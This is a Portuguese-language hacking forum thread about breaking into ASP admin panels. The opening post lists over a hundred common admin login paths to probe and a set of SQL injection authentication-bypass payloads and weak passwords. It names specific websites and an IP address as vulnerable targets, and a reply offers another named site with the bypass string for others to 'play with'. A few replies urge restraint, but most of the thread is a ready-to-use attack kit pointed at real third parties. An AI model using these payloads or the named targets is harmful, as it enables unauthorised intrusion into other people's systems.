Strings/local do admin

[Anonymous]

Algumas strings...

/admin/default.asp
/admin/index.asp
/admin/login.asp
/admin/password.asp
/admin/senha.asp
/login/login.asp
/adm/login.asp
/adm/index.asp
/adm/default.asp
/login/index.asp
/login/default.asp
/webmaster/login.asp
/webadmin/default.asp
/webadmin/index.asp
/webadmin/default.asp
/acesso/admin.asp
/acesso/admin/default.asp
/acesso/admin/index.asp
/adm/admin/default.asp
/adm/admin/index.asp
/adm/admin/login.asp
/adm/default.asp
/adm/index.asp
/adm/login.asp
/admin/acesso.asp
/admin/adm/senha.asp
/admin/admin.asp
/admin/admin/adm.asp
/admin/admin/default.asp
/admin/autenticar.asp
/admin/default.asp
/admin/entrar.asp
/admin/index.asp
/admin/logar.asp
/admin/login.asp
/admin/logout.asp
/admin/loja/senha.asp
/admin/lojas/default.asp
/admin/lojas/index.asp
/admin/menu.asp
/admin/painel.asp
/admin/password.asp
/admin/senha.asp
/admin/site/entrar.asp
/administrador/login.asp
/area_restrita/admin.asp
/area_restrita/index.asp
/area_restrita/login.asp
/asp/admin/default.asp
/asp/admin/index.asp
/asp/admin/login.asp
/banner/admin/
/banner/admin/default.asp
/banner/admin/index.asp
/banners/admin.asp
/banners/admin/default.asp
/banners/admin/index.asp
/banners/admin/login.asp
/busines/admin/
/cadastro/admin/
/client/admin.asp
/clientes/admin/
/comercio/admin.asp
/comercio/admin/default.asp
/comercio/admin/index.asp
/compras/admin/
/controle/admin.asp
/controle/admin/default.asp
/controle/admin/index.asp
/controle/admin/login.asp
/db/admin/default.asp
/db/admin/index.asp
/db/admin/login.asp
/db/admin/senha.asp
/ecommerce/admin/default.asp
/ecommerce/admin/index.asp
/ecommerce/admin/login.asp
/edit/admin/default.asp
/edit/admin/index.asp
/editar/admin.asp
/editar/admin/default.asp
/editar/admin/index.asp
/editar/admin/login.asp
/eshop/admin.asp
/eshop/admin/
/eshop/admin/default.asp
/eshop/admin/index.asp
/form/admin.asp
/home/adm/defaul.asp
/home/adm/index.asp
/home/admin/login.asp
/home/admin/senha.asp
/host/admin/default.asp
/host/admin/index.asp
/host/admin/login.asp
/images/admin/
/imprensa/admin.asp
/imprensa/admin/default.asp
/imprensa/admin/index.asp
/imprensa/admin/login.asp
/imprensa/login.asp
/login/admin.asp
/login/default.asp
/login/index.asp
/login/login.asp
/login_admin/default.asp
/login_admin/index.asp
/login_admin/login.asp
/loja/admin.asp
/menu/admin/admin.asp
/menu/admin/default.asp
/menu/admin/index.asp
/menu/admin/login.asp
/menu/admin/senha.asp
/menu_admin/default.asp
/menu_admin/index.asp
/menu_admin/login.asp
/menu_admin/senha.asp
/news/admin/
/news/admin/default.asp
/news/admin/index.asp
/news/admin/login.asp
/news/admin/senha.asp
/newsleter/admin.asp
/newsleter/admin/default.asp
/newsleter/admin/index.asp
/noticias/admin/
/noticias/admin/senha.asp
/order/admin/default.asp
/order/admin/index.asp
/order/admin/login.asp
/order/admmin.asp
/painel/admin/admin.asp
/painel/admin/default.asp
/painel/admin/index.asp
/painel/admin/login.asp
/painel/admin/senha.asp
/parceiros/admin.asp
/parceiros/admin/default.asp
/parceiros/admin/index.asp
/parceiros/admin/login.asp
/pedidos/admin/default.asp
/pedidos/admin/index.asp
/pedidos/admin/login.asp
/pedidos/admin/senha.asp
/portal/admin/
/portal/admin/senha.asp
/post/admin/
/post/admin/default.asp
/post/admin/index.asp
/post/admin/login.asp
/principal/admin.asp
/principal/admin/default.asp
/principal/admin/index.asp
/principal/admin/login.asp
/principal/admin/senha.asp
/restrito/acesso/admin.asp
/restrito/adm/login.asp
/restrito/admin.asp
/shop/admin/default.asp
/shop/admin/index.asp
/shop/admin/logar.asp
/shop/admin/login.asp
/shopping/admin.asp
/shopping/admin/default.asp
/shopping/admin/index.asp
/shopping/admin/login.asp
/site/admin/
/site/admin/default.asp
/site/admin/index.asp
/site/admin/login.asp
/site/admin/senha.asp
/store/admin.asp
/store/admin/default.asp
/store/admin/index.asp
/store/admin/logar.asp
/stroe/admin/login.asp
/strore/admin/senha.asp
/vendas/admin/senha.asp
/web/admin/default.asp
/web/admin/index.asp
/web/admin/login.asp
/webadmin/default.asp
/webadmin/index.asp
/webmaster/autenticar.asp
/webmaster/entrar.asp
/webmaster/logar.asp
/webmaster/login.asp
/webmaster/senha.asp

' or ' 1
'1' = '1'
' or '1'='1
'' or '1'='1'
"senha"
"password"
"teste"
"123"
"1234"
"12345"
"VB"
"visual"
"basic"
' or senha='teste
' or senha='login 'or email like 'dm%
' or email like 'dm%
'or '1'='1' order by 1 --
' or '1'='1' order by 1 --
' or 1=1--
'or''='
' or 'a'='a
') or ('a'='a
b' or ' 1='
' or '|
123'or'=
admin'-
' or '1=true
7' or ' 1


Vulneráveis:

http://203.155.220.217/dopc/news/admin/login.asp

http://www.caltriplecrown.org/Admin/PassWord.asp

Fonte: Orkut&Comunity; 'Vulnerabilidades & XPL'  um post meu.. 

[Wuefez]

uheuheuheuheuheuhe

quando é que será que esses admins vão aprender....

um site bugado ai pra vocês brincarem

www.rapidintake.com

login: 'or' senha 'or'

falouzzzzzzz

[Anonymous]

Very well como sempre Storm...



Bjos

[Shady]

E por favor, sejam sensatos com o site que tem a falha.

[Anonymous]

E por favor, sejam sensatos com o site que tem a falha.

Pois é, bom ressaltar o 'bom senso' pessoal.

[d3rf]

E por favor, sejam sensatos com o site que tem a falha.

Hehehe ...
Ainda Shady, q aki no darkers o nº de Script Kiddies tem diminuido por restriçoes administrativas na hora do cadastro , hehehe

Mas, SQL Injection 'or' senha 'or'? Pensei q nao funfava mais ....